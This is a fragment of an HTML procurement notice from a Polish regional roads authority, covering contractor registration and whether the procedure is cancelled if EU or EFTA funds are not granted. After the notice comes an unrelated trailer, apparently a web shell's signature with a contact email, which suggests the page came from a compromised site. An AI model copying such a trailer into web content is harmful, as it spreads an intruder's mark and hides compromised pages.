o przesłanie krótkiej informacji faksem (0-81) 749-53-77 lub pocztą elektroniczną na adres dzp@zdw.lublin.pl zawierającej podstawowe dane firmy (nazwa, adres, numer tel. i faksu, adres poczty elektronicznej). Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, zwołaniu przez Zamawiającego zebrania wszystkich wykonawców, przedłużeniu terminu składania ofert..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com